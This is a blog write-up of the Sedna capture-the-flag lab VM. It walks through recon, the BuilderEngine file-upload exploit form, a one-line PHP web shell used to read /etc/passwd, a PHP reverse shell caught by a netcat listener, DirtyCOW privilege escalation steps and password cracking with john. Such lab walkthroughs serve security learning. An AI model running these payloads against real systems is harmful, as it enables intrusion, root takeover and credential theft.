WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

Sedna

wwrdpldnadmin | 19 May, 2017 21:43

SEDNA

 

Sedna is the 2nd VM in a 3 part series. It is considered intermediate. I would consider the retrieval of the flags to be intermediate but the breaching of the server to be closer to beginner.

The vm boots and presents me with an IP Address: 192.168.241.129

Recon is the first step in hacking. I usually start with an nmap scan.

nmap -sS -sU -T4 -A -v 192.168.241.129

alt

 

 

Next, I run an enum since I see 445 is open.

#enum4linux 192.168.241.129

=========================================

|    OS information on 192.168.241.129    |

 =========================================

[+] Got OS info for 192.168.241.129 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]

[+] Got OS info for 192.168.241.129 from srvinfo:

            SEDNA          Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)

            platform_id     : 500

            os version      :  4.9

            server type     :  0x809a03

================================

|    Users on 192.168.241.129    |

 ================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper     Desc:

index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root  Name: root       Desc:

user:[viper] rid:[0x3e8]

user:[root] rid:[0x3e9]

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled

Minimum Password Length: 5

 

==========================================================================

|    Users on 192.168.241.129 via RID cycling (RIDS: 500-550,1000-1050)    |

 ==========================================================================

[I] Found new SID: S-1-5-21-2217169221-2747901371-1699642345

[I] Found new SID: S-1-22-1

[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-2217169221-2747901371-1699642345 and logon username '', password ''

S-1-5-21-2217169221-2747901371-1699642345-1000 SEDNA\viper (Local User)

S-1-5-21-2217169221-2747901371-1699642345-1001 SEDNA\root (Local User)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\crackmeforpoints (Local User)

Next I open the browser and navigate to the root page. I am presented with a familiar image. Clicking on it reveals another familiar image.

Dirbuster reveals more than just the two base images at http://192.168.241.129:80

alt

A casual look through these directories revealed the web application they were for.

alt

A quick check for builderengine on Exploit-DB showed two versions of a Remote File Inclusion vulnerability. One is for metasploit and one manual. I decided to use the manual one.

https://www.exploit-db.com/exploits/40390/

<!--

# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

# Date: 18/09/2016

# Exploit Author: metanubix

# Vendor Homepage: http://builderengine.org/

# Software Link: http://builderengine.org/page-cms-download.html

# Version: 3.5.0

# Tested on: Kali Linux 2.0 64 bit

# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

 

 Unauthenticated Unrestricted File Upload:

        POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

        Vulnerable Parameter: files[]

 

        We can upload test.php and reach the file via the following link:

        /files/test.php

-->

<html>

<body>

<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">

        <input type="file" name="files[]" />

        <input type="submit" value="send" />

</form>

</body>

</html>

 

I create an html page on my kali box, copy/paste the html code and modify for my environment.

<html>

<body>

<form method="post" action="http://192.168.241.129/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">

        <input type="file" name="files[]" />

        <input type="submit" value="send" />

</form>

</body>

</html>

 

 

 

 

 

I open this new page locally:

alt

I click browse and choose a text file, test.txt and click send. I receive the following response:

alt

Ok, looks good. I navigate to the directory that the file is supposed to be dumped into:

alt

That’s my test file. Let’s see where we can go from here. I repeat the process but this time I upload my favorite “easy phpeasy” script:

Shell.php containing

<?php

system($_GET["com"]);

?>

Now I navigate to this new file and add the command syntax:

 http://192.168.241.129/files/shell.php?com=ls

alt

Done and Done. Let’s see what we can enumerate.(Many hackers would prefer to upload a reverse shell at this point. I often do this myself but lately I’ve been trying to reduce the number of tools I upload so that I can cover my tracks more easily. It may come down to uploading a shell but for now I’m going to see what I can learn by searching and reading. Remember, the first step is recon. You return to this step many times during a pentest. Programmers may live by “Hello World” Hackers live by “Goto 10”)

After casually looking through the directories using ls, I find some info:

http://192.168.241.129/files/shell.php?com=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

libuuid:x:100:101::/var/lib/libuuid:

syslog:x:101:104::/home/syslog:/bin/false

mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false

messagebus:x:103:108::/var/run/dbus:/bin/false

bind:x:104:115::/var/cache/bind:/bin/false

postfix:x:105:116::/var/spool/postfix:/bin/false

dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false

dovecot:x:107:118:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false

dovenull:x:108:119:Dovecot login user,,,:/nonexistent:/bin/false landscape:x:109:120::/var/lib/landscape:/bin/false

sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false

libvirt-qemu:x:114:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false

libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false tomcat7:x:116:126::/usr/share/tomcat7:/bin/false crackmeforpoints:x:1000:1000::/home/crackmeforpoints:

statd:x:117:65534::/var/lib/nfs:/bin/false

 

http://192.168.241.129/files/shell.php?com=cat%20/etc/*release*

DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS" NAME="Ubuntu" VERSION="14.04.1 LTS, Trusty Tahr" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 14.04.1 LTS" VERSION_ID="14.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL=http://bugs.launchpad.net/ubuntu/

 

http://192.168.241.129/files/shell.php?com=cat%20/proc/version

Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014

 

http://192.168.241.129/files/shell.php?com=cat%20../../flag.txt

bfbb7e6e6e88d9ae66848b9aeac6b289

 

Now I’m going to go for a shell, normally I would make my own meterpreter reverse php shell here but metasploit has been very flaky lately with php reverse shells. For this reason I have been using pentestmonkey’s php reverse shell. It can be found here:

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

 

I alter the php reverse shell for my IP and use port 4444 and save it as prs.php. I upload it just as I did shell.php and start a netcat listener

#nc –nvlp 4444

Listening on [any] 4444 ...

 

Then I navigate to http://192.168.241.129/files/prs.php and get a session.

 

connect to [192.168.241.128] from (UNKNOWN) [192.168.241.129] 44011

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

 08:36:32 up  1:30,  0 users,  load average: 0.00, 0.01, 0.05

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$

 

Now for a “proper” shell

 

$python -c 'import pty;pty.spawn("/bin/bash")'

www-data@Sedna:/$

 

So this version of linux and kernel should be vulnerable to one of the ofs privilege exploits but I could not get any of them to work. So I decided to use dirtycow. Dirtycow is a bit tricky. It likes to crash vm’s. The best way I have found to avoid this is to have the commands ready on scratch paper so you can cut and paste. If you are a fast enough typer then this isn’t necessary but it’s useful the first time. I’m going to list the steps for this one.

 

1)      Download the exploit to your system, https://www.exploit-db.com/exploits/40839/

Save it as whatever you like (I chose firefart.c because that’s the username it creates)

2)      Use the rfi.html uploader used earlier to copy the file to the target

alt

3)      Compile the file on the target machine through our existing netcat shell.

$gcc -pthread firefart.c -o firefart –lcrypt

4)      Open another terminal and prepare to ssh into the target with the firefart user, don’t hit enter yet.

# ssh firefart@192.168.241.129

5)      Have this command ready on scratch paper

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

6)      In the netcat shell session type ./firefart firefart (the second firefart is setting the password to,…you guessed it, firefart.) Hit enter

7)      Go to you waiting terminal window with the ssh command and hit enter, enter the password when prompted (It’s firefart)

8)      Immediately copy and paste the echo 0 > /proc/sys/vm/dirty_writeback_centisecs command into the ssh terminal.

9)      Enjoy your root shell!

 

You have about 20 seconds between step 6 and step 8. If you don’t do this in time, the vm will crash. I did this about three times in a row, trying to figure out why it was doing it and actually FUBAR’d the vm. I had to dump it and start over. I finally found the fix by searching with google. I forgot where I found it but, if I can find it again, I will edit and give credit here.

 

Now, for the flags. We already have the first flag without even getting a real shell. Let’s find the next one,…probably in the root directory.

 

firefart@Sedna:/var/www# cd /root

firefart@Sedna:~# cat flag.txt

a10828bee17db751de4b93661455830

 

During the dump of /etc/passwd I saw a user named crackmeforpoints. I copied this entry from /etc/passwd and the co-entry from /etc/shadow and used john to unshadow to a file called,….unshadow( creative, I know) Then I ran john to decrypt.

alt

 

I believe this is one of the four flags.

 

I poked around for the last flag. I believe I found it in the tomcat config file /etc/tomcat7/tomcat-users.xml

 

alt

 

Over all I enjoyed this vm. I would like to see the flags handled a little differently. I think it would be better if they actually said flag1.txt-flag4.txt. General

 

«Previous   1 2 3 4  Next»
 
Accessible and Valid XHTML 1.0 Strict and CSS
Powered by LifeType - Design by BalearWeb